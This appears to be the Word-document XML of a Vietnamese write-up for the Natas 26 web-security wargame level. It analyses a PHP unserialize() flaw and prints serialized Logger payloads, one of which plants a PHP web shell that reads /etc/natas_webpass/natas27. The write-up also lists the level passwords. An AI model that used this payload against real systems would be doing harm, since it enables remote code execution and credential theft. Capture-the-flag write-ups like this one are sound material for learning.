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3D4C7B7" w14:textId="77777777" w:rsidR="00641FDC" w:rsidRPr="009C5AF0" w:rsidRDefault="00641FDC" w:rsidP="00641FDC">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="009C5AF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>natas27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE7FB6" w14:textId="1BF6AA1A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60E856CC" w14:textId="0DF9D673" w:rsidR="00641FDC" w:rsidRDefault="00641FDC" w:rsidP="00641FDC">
      <w:pPr>
        <w:ind w:right="-421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Bạn dùng thông tin đăng nhập sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00641FDC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natas26: 8A506rfIAXbKKk68yJeuTuRq4UfcK70k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4C4EE" w14:textId="77777777" w:rsidR="00641FDC" w:rsidRDefault="00641FDC" w:rsidP="00641FDC">
      <w:pPr>
        <w:ind w:right="-421"/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227646DB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Bài này cho tham số x1,y1,x2,y2 để vẽ hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E88FBF4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5836828D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Source code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B3CEE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019D4AE9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259ECF5F" wp14:editId="58863891">
            <wp:extent cx="2743200" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="23" name="Picture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23"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1"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3846"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2743200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        </w:t>
      </w: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3034F056" wp14:editId="79F4EF07">
            <wp:extent cx="2856523" cy="3711600"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0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26"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1"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1899"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2856523" cy="371160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A4F74F6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2546AA35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482CCF0" wp14:editId="68FCF484">
            <wp:extent cx="3009418" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="635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27"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1"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367"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3009418" cy="3714750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2FC7202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49AE8224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Phân tích code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C3853E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55DB7BBB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1. Chúng ta có thể xem hình ở file img/natas26_</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC5162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nuclj32vsdpa6draq4j3q1nopi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.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60269776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2. Nó vẽ hình bằng hàm drawFromUserdata($img). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D849A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3. Gửi img đến filepath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724CFA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4. Set cookies[“drawing”]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F0CFD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6FE21F26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Để lấy được flag, mình phải đọc  file /etc/natas_webpass/natas27.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D1DB75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1DDCEBA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Mình thấy hàm unserialize() nên nghĩ đến insecure deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F491878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723C9346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18EAE2E9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4B3D6A48" wp14:editId="0E232F71">
            <wp:extent cx="5943600" cy="5991860"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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" name="Picture 30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991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0FCF80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27982696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130D0E1B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Có 2 magic method là __destruct và __construct. Mình không thể dùng __construct vì nó ghi vào thư mục /tmp mà mình không thể truy cập được. Mình phải khởi tạo mới dùng được __construct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2CB7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75A49421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Mình để ý thấy __destruct cho phép  ghi file. Mình nghĩ ngay đến việc </w:t>
      </w:r>
      <w:r w:rsidRPr="00307155"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  <w:t>chuyển đến 1 thư mục có thể truy cập được</w:t>
      </w:r>
      <w:r w:rsidRPr="00307155">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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và exitMsg là “abc” . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3B89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665D4368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22EFE2B8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67D982EF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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00307155"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  <w:t>O:6:"Logger":2:{s:7:"logFile";s:11:"img/abc.txt";s:7:"exitMsg";s:3:"abc";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80FFB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55DED0BE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Nó báo lỗi: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFAEAE1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38119C1F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6DFA903" wp14:editId="7D63C34F">
            <wp:extent cx="2705100" cy="327660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1" name="Picture 31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705100" cy="3276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69F17B2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705CD79C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Mình dùng đối tượng Logger nhưng nó báo lỗi là mảng. Đọc kĩ thì thấy do storeData() có hàm array() nên __destruct vẫn được thực hiện thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C8749B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092E3EBF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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7748AB33" wp14:editId="39DCCD52">
            <wp:extent cx="2569210" cy="925975"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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2" name="Picture 32"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1"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6767" b="75069"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2569580" cy="926108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4E29D018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3521171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517F962F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Tiếp theo, mình </w:t>
      </w:r>
      <w:r w:rsidRPr="00583395">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tạo 1 file index.php và thực thi nó</w:t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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B17832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015CD7F5" w14:textId="77777777" w:rsidR="00641FDC" w:rsidRPr="00307155" w:rsidRDefault="00641FDC" w:rsidP="00641FDC">
      <w:pPr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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00307155">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O:6:"Logger":2:{s:7:"logFile";s:13:"img/index.php";s:7:"exitMsg";s:48:"&lt;?php system("cat /etc/natas_webpass/natas27")?&gt;";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D5718C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5471F3C2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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66BD9E20" wp14:editId="13681B94">
            <wp:extent cx="2985770" cy="937549"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="33" name="Picture 3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3" name="Picture 33"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1"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49757" b="74757"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2986268" cy="93770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2A12DFF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</w:p>
    <w:p w14:paraId="6C6E6547" w14:textId="77777777" w:rsidR="00641FDC" w:rsidRDefault="00641FDC" w:rsidP="00641FDC">
      <w:pP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</w:pP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 xml:space="preserve">Nhìn đơn giản vậy thôi chứ mình mất rất nhiều thời gian để làm huhu </w:t>
      </w:r>
      <w:r w:rsidRPr="00A53924"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sym w:font="Wingdings" w:char="F04C"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Mình còn viết demo để test nữa. Thật sự đây là 1 bài rất hay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230463C" w14:textId="77777777" w:rsidR="00641FDC" w:rsidRDefault="00641FDC" w:rsidP="00641FDC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</w:p>
    <w:p w14:paraId="710345EF" w14:textId="77777777" w:rsidR="00641FDC" w:rsidRDefault="00641FDC" w:rsidP="00641FDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">natas27: </w:t>
      </w:r>
      <w:r w:rsidRPr="005606C3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PSO8xysPi00WKIiZZ6s6PtRmFy9cbxj3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A8B33" w14:textId="77777777" w:rsidR="002F49FE" w:rsidRDefault="002F49FE"/>
    <w:sectPr w:rsidR="002F49FE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3" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="8000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Wingdings">
    <w:panose1 w:val="05000000000000000000"/>
    <w:charset w:val="4D"/>
    <w:family w:val="decorative"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000001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70E668E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:styleLink w:val="Style1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr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2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
      </w:r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99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41FDC"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00641FDC"/>
    <w:rsid w:val="00BD107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VN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,"/>
  <w14:docId w14:val="102D4D69"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9DD70E24-FEB4-0945-84D2-574E7619F17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VN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641FDC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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numbering" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD107F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr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</TotalTime>
  <Pages>5</Pages>
  <Words>214</Words>
  <Characters>1224</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1436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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-29T12:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-29T12:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>